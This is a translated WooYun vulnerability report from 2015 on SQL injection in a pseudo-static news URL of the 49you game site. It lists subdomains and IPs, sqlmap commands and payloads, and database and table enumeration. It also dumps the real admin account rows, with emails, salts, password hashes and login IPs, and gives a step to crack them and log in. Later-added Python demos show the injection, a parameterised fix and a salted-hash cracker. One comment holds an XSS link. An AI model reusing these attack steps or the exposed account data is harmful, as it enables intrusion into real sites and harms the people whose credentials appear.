
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0123305

Title: SQL injection in a pseudo-static URL on the 49you web-game main site exposes 2 databases and 100 tables (including admin account passwords); a case study for beginners

Vendor: 49you.com

Author: ’‘Nome

Submitted: 2015-06-29 08:49

Fixed: 2015-08-13 10:26

Published: 2015-08-13 10:26

Type: SQL injection

Severity: High

Self-assessed rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure timeline:

2015-06-29: Details sent to the vendor, awaiting handling
2015-06-29: Vendor confirmed; details visible to the vendor only
2015-07-09: Details opened to core white hats and domain experts
2015-07-19: Details opened to regular white hats
2015-07-29: Details opened to intern white hats
2015-08-13: Details opened to the public

Brief description:

From the sqlmap output, the injectable account sees two databases: i_49you, which stores the site data, and information_schema, which is MySQL's built-in metadata schema rather than a configuration database.

Detailed description:

First, enumerate subdomains with lijiejie's subdomain brute-force tool:

blog.49you.com 120.31.134.71
www.49you.com 120.26.12.115
cs.49you.com 120.26.12.115
i.49you.com 121.10.246.74
user.49you.com 120.26.12.115
mail.49you.com 112.90.78.157, 112.90.77.178
pay.49you.com 120.26.12.115
bbs.49you.com 122.13.176.71
shop.49you.com 120.26.12.115
h5.49you.com 61.136.166.94, 120.26.12.115
m.49you.com 119.38.128.234
gm.49you.com 119.38.128.227
status.49you.com 112.91.150.231
api.49you.com 119.38.128.229, 119.38.128.228
all.49you.com 183.6.152.58
met.49you.com 222.132.16.231, 222.132.16.232
dj.49you.com 211.147.224.152
adv.49you.com 120.26.3.80
customer.49you.com 121.10.246.67
vpn.49you.com 112.90.180.118
stage.49you.com 120.26.3.80
ml.49you.com 120.26.3.86
m.49you.com 119.38.128.234
count.adv.49you.com 119.38.128.236
24 found | 0 remaining | 34009 scanned in 417.17 seconds


Then go through the sites one by one. On reaching

http://i.49you.com/news/item/catid/55*/id*/15*.html

run an SQL injection test. The URL is pseudo-static (a rewrite rule maps the path segments onto query parameters), so there is no name=value pair for sqlmap to pick up on its own; the '*' markers tell it which path segments to treat as injection points:
root@kali:~# sqlmap -u "http://i.49you.com/news/item/catid/55*/id*/15*.html"
[sqlmap banner: version 1.0-dev-nongit-20150520, http://sqlmap.org]
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 15:25:41
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[15:25:42] [INFO] testing connection to the target URL
[15:25:43] [INFO] testing if the target URL is stable. This can take a couple of seconds
[15:25:44] [INFO] target URL is stable
[15:25:44] [INFO] testing if URI parameter '#1*' is dynamic
[15:25:44] [INFO] confirming that URI parameter '#1*' is dynamic
[15:25:44] [WARNING] URI parameter '#1*' does not appear dynamic
[15:25:44] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[15:25:44] [INFO] testing for SQL injection on URI parameter '#1*'
[15:25:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:25:46] [INFO] URI parameter '#1*' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[15:25:47] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[15:25:48] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:25:48] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[15:25:48] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[15:25:48] [INFO] testing 'MySQL inline queries'
[15:25:48] [INFO] testing 'PostgreSQL inline queries'
[15:25:48] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[15:25:48] [INFO] testing 'Oracle inline queries'
[15:25:48] [INFO] testing 'SQLite inline queries'
[15:25:48] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[15:25:48] [WARNING] time-based comparison requires larger statistical model, please wait....
[15:25:59] [INFO] URI parameter '#1*' seems to be 'MySQL > 5.0.11 stacked queries' injectable
[15:25:59] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (SELECT)'
[15:26:09] [INFO] URI parameter '#1*' seems to be 'MySQL > 5.0.11 AND time-based blind (SELECT)' injectable
[15:26:09] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[15:26:09] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[15:26:10] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[15:26:10] [INFO] target URL appears to have 6 columns in query
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[15:26:19] [INFO] URI parameter '#1*' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if ann
sqlmap identified the following injection points with a total of 57 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://i.49you.com:80/news/item/catid/55') AND 5748=5748 AND ('PVTP'='PVTP/id/15.html
Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: http://i.49you.com:80/news/item/catid/-3532') UNION ALL SELECT 27,27,27,27,CONCAT(0x717a766a71,0x61444764746356687863,0x7178717071),27#/id/15.html
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: http://i.49you.com:80/news/item/catid/55'); SELECT SLEEP(5)-- /id/15.html
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: http://i.49you.com:80/news/item/catid/55') AND (SELECT * FROM (SELECT(SLEEP(5)))UocR) AND ('QaNG'='QaNG/id/15.html
---
[15:27:19] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.14
back-end DBMS: MySQL 5.0.11
[15:27:19] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 32 times
[15:27:19] [INFO] fetched data logged to text files under '/root/.sqlmap/output/i.49you.com'
[*] shutting down at 15:27:19
Promising: the catid segment (55) of the pseudo-static URL is injectable by four techniques (boolean-blind, UNION, stacked queries, time-blind). Only the first marked segment ('#1*', the catid value) appears in the results; the id segments were not tested further.
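To make the mechanics concrete, here is an added example, not code from the original report or from 49you: a small Python model of a pseudo-static route feeding a string-built query, next to a hardened handler. The route regex, the three-column news table, the admin rows and the SQL template are assumptions constructed for the demo (the real query had six columns, per the UNION result); the payload shapes follow the sqlmap results above, with '-- ' standing in for MySQL's '#' because the in-memory SQLite stand-in has no '#' comment.

```python
import re
import sqlite3

# Constructed sample data standing in for the i_49you schema. The admin rows
# are made up; they are not the values dumped on the page.
NEWS_ROWS = [
    (15, 55, "Server maintenance notice"),
    (16, 55, "New server opening"),
    (17, 60, "Recruiting testers"),
]
ADMIN_ROWS = [
    (1, "admin", "constructed-hash-1"),
    (2, "editor", "constructed-hash-2"),
]


def make_db():
    """In-memory SQLite stand-in for the MySQL backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER, catid INTEGER, title TEXT)")
    conn.execute("CREATE TABLE admin (userid INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?, ?)", NEWS_ROWS)
    conn.executemany("INSERT INTO admin VALUES (?, ?, ?)", ADMIN_ROWS)
    return conn


# Assumed rewrite rule: /news/item/catid/<catid>/id/<id>.html -> two parameters.
# Like a real nginx rewrite it only relocates text; it validates nothing.
ROUTE = re.compile(r"^/news/item/catid/(?P<catid>[^/]+)/id/(?P<id>[^/]+)\.html$")


def route(path):
    """Return the path segments as a dict, exactly as the rewrite would."""
    m = ROUTE.match(path)
    if not m:
        raise ValueError("no route for %r" % path)
    return m.groupdict()


def fetch_vulnerable(conn, path):
    """Builds the WHERE clause by string formatting. Each value sits inside
    ('...'), which is what sqlmap's ') prefix and ('x'='x suffix imply."""
    p = route(path)
    sql = ("SELECT id, catid, title FROM news "
           "WHERE (catid='%s') AND (id='%s')" % (p["catid"], p["id"]))
    return conn.execute(sql).fetchall()


def fetch_hardened(conn, path):
    """Same route, but the segments must be plain integers and the query is
    parameterised, so rewrite output can never reach the SQL grammar."""
    p = route(path)
    if not (p["catid"].isdigit() and p["id"].isdigit()):
        raise ValueError("catid and id must be numeric")
    sql = "SELECT id, catid, title FROM news WHERE (catid=?) AND (id=?)"
    return conn.execute(sql, (int(p["catid"]), int(p["id"]))).fetchall()


def hardened_rejects(conn, path):
    """True when the hardened handler refuses the path instead of querying."""
    try:
        fetch_hardened(conn, path)
    except ValueError:
        return True
    return False


# Paths shaped like the sqlmap payloads on the page (URL-decoded). SQLite has
# no '#' comment, so '-- ' plays the role of the trailing '#' in the UNION one.
LEGIT = "/news/item/catid/55/id/15.html"
BOOL_TRUE = "/news/item/catid/55') AND 5748=5748 AND ('PVTP'='PVTP/id/15.html"
BOOL_FALSE = "/news/item/catid/55') AND 5748=5749 AND ('PVTP'='PVTP/id/15.html"
UNION = ("/news/item/catid/-1') UNION ALL SELECT userid, username, password "
         "FROM admin-- /id/15.html")

if __name__ == "__main__":
    conn = make_db()
    for name, path in [("legit", LEGIT), ("bool true", BOOL_TRUE),
                       ("bool false", BOOL_FALSE), ("union", UNION)]:
        print("vulnerable %-10s -> %s" % (name, fetch_vulnerable(conn, path)))
        print("hardened   %-10s -> %s" % (
            name, "rejected" if hardened_rejects(conn, path) else fetch_hardened(conn, path)))
```

Running it prints the legitimate row for the clean URL, the same row for the 'true' boolean payload and nothing for the 'false' one (the differential sqlmap measured), the admin rows for the UNION payload, and a rejection from the hardened handler for anything that is not an integer. The rewrite rule hands the application a raw string no matter how static the URL looks; validation and parameterisation have to happen in the handler.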
Next, enumerate the databases: sqlmap -u "http://i.49you.com/news/item/catid/55*/id*/15*.html" --dbs

custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[15:28:57] [INFO] resuming back-end DBMS 'mysql'
[15:28:57] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://i.49you.com:80/news/item/catid/55') AND 5748=5748 AND ('PVTP'='PVTP/id/15.html
Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: http://i.49you.com:80/news/item/catid/-3532') UNION ALL SELECT 27,27,27,27,CONCAT(0x717a766a71,0x61444764746356687863,0x7178717071),27#/id/15.html
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: http://i.49you.com:80/news/item/catid/55'); SELECT SLEEP(5)-- /id/15.html
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: http://i.49you.com:80/news/item/catid/55') AND (SELECT * FROM (SELECT(SLEEP(5)))UocR) AND ('QaNG'='QaNG/id/15.html
---
[15:28:58] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.14
back-end DBMS: MySQL 5.0.11
[15:28:58] [INFO] fetching database names
[15:28:58] [INFO] the SQL query used returns 2 entries
[15:28:58] [INFO] retrieved: information_schema
[15:28:58] [INFO] retrieved: i_49you
available databases [2]:
[*] i_49you
[*] information_schema
[15:28:59] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 3 times
[15:28:59] [INFO] fetched data logged to text files under '/root/.sqlmap/output/i.49you.com'
[*] shutting down at 15:28:59


Two databases. i_49you is the application database (it holds the admin table); information_schema is MySQL's built-in metadata schema, not a configuration database. It is visible to every MySQL user, so its presence says nothing about how many databases the site actually runs.
Next, list the tables in that database: sqlmap -u "http://i.49you.com/news/item/catid/55*/id*/15*.html" -D "i_49you" --tables

custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[15:29:31] [INFO] resuming back-end DBMS 'mysql'
[15:29:31] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://i.49you.com:80/news/item/catid/55') AND 5748=5748 AND ('PVTP'='PVTP/id/15.html
Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: http://i.49you.com:80/news/item/catid/-3532') UNION ALL SELECT 27,27,27,27,CONCAT(0x717a766a71,0x61444764746356687863,0x7178717071),27#/id/15.html
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: http://i.49you.com:80/news/item/catid/55'); SELECT SLEEP(5)-- /id/15.html
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: http://i.49you.com:80/news/item/catid/55') AND (SELECT * FROM (SELECT(SLEEP(5)))UocR) AND ('QaNG'='QaNG/id/15.html
---
[15:29:32] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.14
back-end DBMS: MySQL 5.0.11
[15:29:32] [INFO] fetching tables for database: 'i_49you'
[15:29:32] [INFO] the SQL query used returns 100 entries
[15:29:32] [INFO] retrieved: admin
[15:29:32] [INFO] retrieved: admin_panel
[15:29:32] [INFO] retrieved: admin_role
[15:29:32] [INFO] retrieved: admin_role_priv
[15:29:33] [INFO] retrieved: announce
[15:29:33] [INFO] retrieved: attachment
[15:29:33] [INFO] retrieved: attachment_index
[15:29:33] [INFO] retrieved: badword
[15:29:33] [INFO] retrieved: block
[15:29:33] [INFO] retrieved: block_history
[15:29:33] [INFO] retrieved: block_priv
[15:29:34] [INFO] retrieved: cache
[15:29:34] [INFO] retrieved: category
[15:29:34] [INFO] retrieved: category_priv
[15:29:34] [INFO] retrieved: collection_content
[15:29:34] [INFO] retrieved: collection_history
[15:29:34] [INFO] retrieved: collection_node
[15:29:35] [INFO] retrieved: collection_program
[15:29:35] [INFO] retrieved: content_check
[15:29:35] [INFO] retrieved: copyfrom
[15:29:35] [INFO] retrieved: datacall
[15:29:35] [INFO] retrieved: dbsource
[15:29:35] [INFO] retrieved: download
[15:29:35] [INFO] retrieved: download_data
[15:29:36] [INFO] retrieved: downservers
[15:29:36] [INFO] retrieved: extend_setting
[15:29:36] [INFO] retrieved: favorite
[15:29:36] [INFO] retrieved: game
[15:29:36] [INFO] retrieved: game_data
[15:29:36] [INFO] retrieved: hits
[15:29:37] [INFO] retrieved: ipbanned
[15:29:37] [INFO] retrieved: keylink
[15:29:37] [INFO] retrieved: keyword
[15:29:37] [INFO] retrieved: keyword_data
[15:29:37] [INFO] retrieved: link
[15:29:37] [INFO] retrieved: linkage
[15:29:37] [INFO] retrieved: log
[15:29:38] [INFO] retrieved: member
[15:29:38] [INFO] retrieved: member_detail
[15:29:38] [INFO] retrieved: member_group
[15:29:38] [INFO] retrieved: member_menu
[15:29:38] [INFO] retrieved: member_verify
[15:29:38] [INFO] retrieved: member_vip
[15:29:39] [INFO] retrieved: menu
[15:29:39] [INFO] retrieved: message
[15:29:39] [INFO] retrieved: message_data
[15:29:39] [INFO] retrieved: message_group
[15:29:39] [INFO] retrieved: model
[15:29:39] [INFO] retrieved: model_field
[15:29:39] [INFO] retrieved: module
[15:29:40] [INFO] retrieved: mood
[15:29:40] [INFO] retrieved: news
[15:29:40] [INFO] retrieved: news_data
[15:29:40] [INFO] retrieved: page
[15:29:40] [INFO] retrieved: pay_account
[15:29:40] [INFO] retrieved: pay_payment
[15:29:41] [INFO] retrieved: pay_spend
[15:29:41] [INFO] retrieved: position
[15:29:41] [INFO] retrieved: position_data
[15:29:41] [INFO] retrieved: poster
[15:29:41] [INFO] retrieved: poster_201409
[15:29:41] [INFO] retrieved: poster_201506
[15:29:42] [INFO] retrieved: poster_space
[15:29:42] [INFO] retrieved: queue
[15:29:42] [INFO] retrieved: release_point
[15:29:42] [INFO] retrieved: search
[15:29:42] [INFO] retrieved: search_keyword
[15:29:42] [INFO] retrieved: session
[15:29:43] [INFO] retrieved: site
[15:29:43] [INFO] retrieved: sms_report
[15:29:43] [INFO] retrieved: special
[15:29:43] [INFO] retrieved: special_c_data
[15:29:43] [INFO] retrieved: special_content
[15:29:43] [INFO] retrieved: sphinx_counter
[15:29:43] [INFO] retrieved: sqlmapoutput
[15:29:44] [INFO] retrieved: sso_admin
[15:29:44] [INFO] retrieved: sso_applications
[15:29:44] [INFO] retrieved: sso_members
[15:29:44] [INFO] retrieved: sso_messagequeue
[15:29:44] [INFO] retrieved: sso_session
[15:29:44] [INFO] retrieved: sso_settings
[15:29:45] [INFO] retrieved: tag
[15:29:45] [INFO] retrieved: template_bak
[15:29:45] [INFO] retrieved: test_artice
[15:29:45] [INFO] retrieved: test_artice_data
[15:29:45] [INFO] retrieved: test_picture
[15:29:45] [INFO] retrieved: test_picture_data
[15:29:45] [INFO] retrieved: times
[15:29:46] [INFO] retrieved: type
[15:29:46] [INFO] retrieved: urlrule
[15:29:46] [INFO] retrieved: video
[15:29:46] [INFO] retrieved: video_content
[15:29:46] [INFO] retrieved: video_data
[15:29:46] [INFO] retrieved: video_store
[15:29:47] [INFO] retrieved: vote_data
[15:29:47] [INFO] retrieved: vote_option
[15:29:47] [INFO] retrieved: vote_subject
[15:29:47] [INFO] retrieved: wap
[15:29:47] [INFO] retrieved: wap_type
[15:29:47] [INFO] retrieved: workflow
Database: i_49you
[100 tables]
+--------------------+
| module |
| position |
| session |
| admin |
| admin_panel |
| admin_role |
| admin_role_priv |
| announce |
| attachment |
| attachment_index |
| badword |
| block |
| block_history |
| block_priv |
| cache |
| category |
| category_priv |
| collection_content |
| collection_history |
| collection_node |
| collection_program |
| content_check |
| copyfrom |
| datacall |
| dbsource |
| download |
| download_data |
| downservers |
| extend_setting |
| favorite |
| game |
| game_data |
| hits |
| ipbanned |
| keylink |
| keyword |
| keyword_data |
| link |
| linkage |
| log |
| member |
| member_detail |
| member_group |
| member_menu |
| member_verify |
| member_vip |
| menu |
| message |
| message_data |
| message_group |
| model |
| model_field |
| mood |
| news |
| news_data |
| page |
| pay_account |
| pay_payment |
| pay_spend |
| position_data |
| poster |
| poster_201409 |
| poster_201506 |
| poster_space |
| queue |
| release_point |
| search |
| search_keyword |
| site |
| sms_report |
| special |
| special_c_data |
| special_content |
| sphinx_counter |
| sqlmapoutput |
| sso_admin |
| sso_applications |
| sso_members |
| sso_messagequeue |
| sso_session |
| sso_settings |
| tag |
| template_bak |
| test_artice |
| test_artice_data |
| test_picture |
| test_picture_data |
| times |
| type |
| urlrule |
| video |
| video_content |
| video_data |
| video_store |
| vote_data |
| vote_option |
| vote_subject |
| wap |
| wap_type |
| workflow |
+--------------------+
[15:29:48] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 101 times
[15:29:48] [INFO] fetched data logged to text files under '/root/.sqlmap/output/i.49you.com'
[*] shutting down at 15:29:48


100 tables. Two things worth noticing before dumping anything. The names (admin, admin_role_priv, sso_admin, urlrule, workflow and so on) and the admin columns shown below match the PHPCMS v9 schema with its table prefix removed; if that is the CMS in use, the encrypt column is a per-user salt and the stored value is md5(md5(password) + encrypt), so an unsalted MD5 lookup will not crack these hashes. Also, sqlmapoutput is not part of that schema: sqlmap creates a table of that name to hold the output of OS commands it runs through its MySQL UDF takeover (--os-cmd/--os-shell), which suggests someone had already pushed this injection well past data extraction before this report.
Next step: dump the admin table:
sqlmap -u "http://i.49you.com/news/item/catid/55*/id*/15*.html" -D "i_49you" -T "admin" --dump
Admin table contents:
+--------+--------+---------+---------+------------------+---------+-----------+----------+----------------------------------+----------------+---------------+
| roleid | userid | lang    | card    | email            | encrypt | username  | realname | password                         | lastloginip    | lastlogintime |
+--------+--------+---------+---------+------------------+---------+-----------+----------+----------------------------------+----------------+---------------+
| 1      | 1      | <blank> | <blank> | tanxz@49app.com  | s6SCI6  | admin     | <blank>  | 6074e9112bb7fe18a8aadb8495f73df7 | 113.99.0.43    | 1431054485    |
| 2      | 2      | <blank> | <blank> | fdsafds@qq.com   | v9XvY2  | livebasic | test     | 27357894d16487c7bb2e196a4d0f77e8 | 183.131.11.101 | 1411466593    |
| 2      | 3      | <blank> | <blank> | qianhm@49app.com | HSCAPv  | meimei    | 每每     | f1e0824af35f2380c22b730bfdf36e4c | 183.6.152.58   | 1417662909    |
+--------+--------+---------+---------+------------------+---------+-----------+----------+----------------------------------+----------------+---------------+

[Screenshot: 2015-06-28 16:23:02.png]

[Screenshot: 2015-06-28 16:24:12.png]

Last step: crack the hash and log into the admin backend.
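The dumped rows carry a 6-character encrypt value next to each 32-hex password, so the "crack" step is a salted one. The following is an added example, not code from the original report or from 49you, showing what that step looks like under the assumption that the site runs PHPCMS v9 (an inference from the table and column names, not something the report states): in that CMS the stored value is md5(md5(password) + encrypt). The demo salt, password, hash and wordlist are constructed here; the real hashes on the page are not used.

```python
import hashlib
import itertools
import string


def phpcms_v9_hash(password, encrypt):
    """md5(md5(password) + encrypt), the scheme PHPCMS v9 uses for its admin
    table, with `encrypt` as the per-user salt. That i.49you.com runs PHPCMS v9
    is an inference from the table and column names on this page, not a fact
    the report states."""
    inner = hashlib.md5(password.strip().encode("utf-8")).hexdigest()
    return hashlib.md5((inner + encrypt).encode("utf-8")).hexdigest()


def crack(target_hash, encrypt, candidates):
    """Dictionary attack: first candidate whose salted hash matches, else None.
    The salt ties every guess to one account, so a precomputed table of plain
    MD5 values (the usual online lookup) cannot answer for these rows."""
    target_hash = target_hash.lower()
    for pw in candidates:
        if phpcms_v9_hash(pw, encrypt) == target_hash:
            return pw
    return None


def crack_mask(target_hash, encrypt, alphabet=string.digits, length=4):
    """Exhaustive attack over a fixed mask; cost is len(alphabet) ** length
    hashes per account because the salt forbids sharing work across users."""
    for chars in itertools.product(alphabet, repeat=length):
        pw = "".join(chars)
        if phpcms_v9_hash(pw, encrypt) == target_hash:
            return pw
    return None


# Constructed demo account: the salt has the same shape as the `encrypt`
# values on the page (6 alphanumerics); password and hash are made up here.
DEMO_SALT = "Qz7bK2"
DEMO_PASSWORD = "49you2015"
DEMO_HASH = phpcms_v9_hash(DEMO_PASSWORD, DEMO_SALT)
WORDLIST = ["123456", "admin", "password", "49you", "49you2015", "admin888"]

if __name__ == "__main__":
    print("target:", DEMO_HASH)
    print("dictionary:", crack(DEMO_HASH, DEMO_SALT, WORDLIST))
    print("wrong salt:", crack(DEMO_HASH, "AAAAAA", WORDLIST))
    print("4-digit mask:", crack_mask(phpcms_v9_hash("2015", DEMO_SALT), DEMO_SALT))
```

The wrong-salt run returns nothing even though the password is in the wordlist, which is the practical point: without the encrypt column a dump of the password column alone is far less useful, and a site that pairs each hash with its salt in the same row gives that up together with the hash.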
Done, I'm out.
Next:

Proof of vulnerability:

(Same as the detailed description above.)

Fix recommendation:

I don't really know; a friend asked me to do this...

Copyright notice: when reposting, please credit the source: ’‘Nome@WooYun


Responses

Vendor response:

Severity: Medium

Rank: 8

Confirmed: 2015-06-29 10:24

Vendor reply:

This site is already fairly old; the interim fix is to take this domain offline. Many thanks to white hat @’‘Nome; engineering is working on an urgent fix.

Latest status:

None yet


Rating:

Comments

  1. 2015-06-29 10:44 | ’‘Nome ( Intern white hat | Rank:55 Vulns:19 | Thanks to @M4sk @mango @裤裆 @泳少 @5up3r...)

    @疯狗, boss, is the vendor sending a gift? Should I accept it? @上海49游, is it a gift or not? If not, I won't accept.

  2. 2015-07-01 05:36 | 小龙 ( Regular white hat | Rank:1208 Vulns:316 | WooYun has a group of people who learn their craft on WooYun and then go to some...)

    @’‘Nome Don't accept it; @上海49游, if he doesn't want it, mail it to me.

  3. 2015-07-20 09:33 | DloveJ ( Regular white hat | Rank:1107 Vulns:200 | <a href=javascrip:alert('xss')>s</a> click...)

    Which of lijiejie's tools?